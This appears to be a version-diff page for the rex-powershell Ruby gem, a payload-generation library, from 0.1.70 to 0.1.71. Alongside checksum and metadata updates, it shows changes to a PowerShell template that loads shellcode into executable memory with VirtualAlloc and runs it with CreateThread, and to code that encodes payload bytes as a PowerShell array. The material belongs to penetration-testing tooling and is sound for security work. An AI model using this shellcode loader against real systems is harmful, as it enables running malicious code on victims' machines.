rex-powershell 0.1.70 → 0.1.71

Sign up to get free protection for your applications and to get access to all the features.
Files changed (8) hide show
  1. checksums.yaml +4 -4
  2. checksums.yaml.gz.sig +0 -0
  3. data.tar.gz.sig +0 -0
  4. data/data/templates/to_mem_old.ps1.template +1 -5
  5. data/lib/rex/powershell/script.rb +1 -5
  6. data/lib/rex/powershell/version.rb +1 -1
  7. metadata +2 -2
  8. metadata.gz.sig +0 -0
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA1:
3
- metadata.gz: d6f6a90078d7ff2c818055f47b07acbebf301cab
4
- data.tar.gz: 9985d763cba997475fef83e74780129b3027f3f7
3
+ metadata.gz: 3913c3cb269688b4aa91f076b92a5c8be40d6d2d
4
+ data.tar.gz: e9b641b0d6e95afc83c586f557bde88b6debc69d
5
5
  SHA512:
6
- metadata.gz: 7e579c30c19742f0e2e653e5a52877456ceba55da5794791e66f86749b8934525e194b439d2e0c704d3faff6a171b8bb2b2a4102717cc414c23cc146237ae36e
7
- data.tar.gz: 37b8554490a32dbd12796fb41f53d60ca99f9ffdb667c939745adbeba8658a654c59a348e85e2642e63743590a41d566f46ddae274e49b0734cf347eac8fd30e
6
+ metadata.gz: d2dbc7886054eedff5a4992a6877da7eb8f64ce9f1dc60ee2be73c810584c831f9b4a0d0431590711b17990c8dcd72e3ca7f2caf9014fb993f85b922a439e5a5
7
+ data.tar.gz: cd9097d4897ca80bb455b1e74b44882864bf986b81ed2b03af53c31ab306e93cd6c8513bfca13244ffc2f7884af3f1a3a4ac6779ef0bc5891baf2606a659ef09
checksums.yaml.gz.sig CHANGED
Binary file
data.tar.gz.sig CHANGED
Binary file
data/data/templates/to_mem_old.ps1.template CHANGED
@@ -3,8 +3,6 @@ $%{var_syscode} = @"
3
3
  public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
4
4
  [DllImport("kernel32.dll")]
5
5
  public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
6
- [DllImport("msvcrt.dll")]
7
- public static extern IntPtr memset(IntPtr dest, uint src, uint count);
8
6
  "@
9
7
 
10
8
  $%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru
@@ -13,8 +11,6 @@ $%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -n
13
11
 
14
12
  $%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)
15
13
 
16
- for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
17
- $%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
18
- }
14
+ [System.Runtime.InteropServices.Marshal]::Copy($%{var_code},0,$%{var_rwx},$%{var_code}.Length)
19
15
 
20
16
  $%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)
data/lib/rex/powershell/script.rb CHANGED
@@ -75,11 +75,7 @@ module Powershell
75
75
  psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
76
76
  lines = []
77
77
  1.upto(code.length - 1) do |byte|
78
- if (byte % 10 == 0)
79
- lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
80
- else
81
- lines.push ",0x#{code[byte].to_s(16)}"
82
- end
78
+ lines.push ",0x#{code[byte].to_s(16)}"
83
79
  end
84
80
 
85
81
  psh << lines.join('') + "\r\n"
data/lib/rex/powershell/version.rb CHANGED
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Powershell
3
- VERSION = "0.1.70"
3
+ VERSION = "0.1.71"
4
4
  end
5
5
  end
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: rex-powershell
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.70
4
+ version: 0.1.71
5
5
  platform: ruby
6
6
  authors:
7
7
  - David 'thelightcosine' Maloney
@@ -88,7 +88,7 @@ cert_chain:
88
88
  G+Hmcg1v810agasPdoydE0RTVZgEOOMoQ07qu7JFXVWZ9ZQpHT7qJATWL/b2csFG
89
89
  8mVuTXnyJOKRJA==
90
90
  -----END CERTIFICATE-----
91
- date: 2017-04-07 00:00:00.000000000 Z
91
+ date: 2017-04-26 00:00:00.000000000 Z
92
92
  dependencies:
93
93
  - !ruby/object:Gem::Dependency
94
94
  name: bundler
metadata.gz.sig CHANGED
Binary file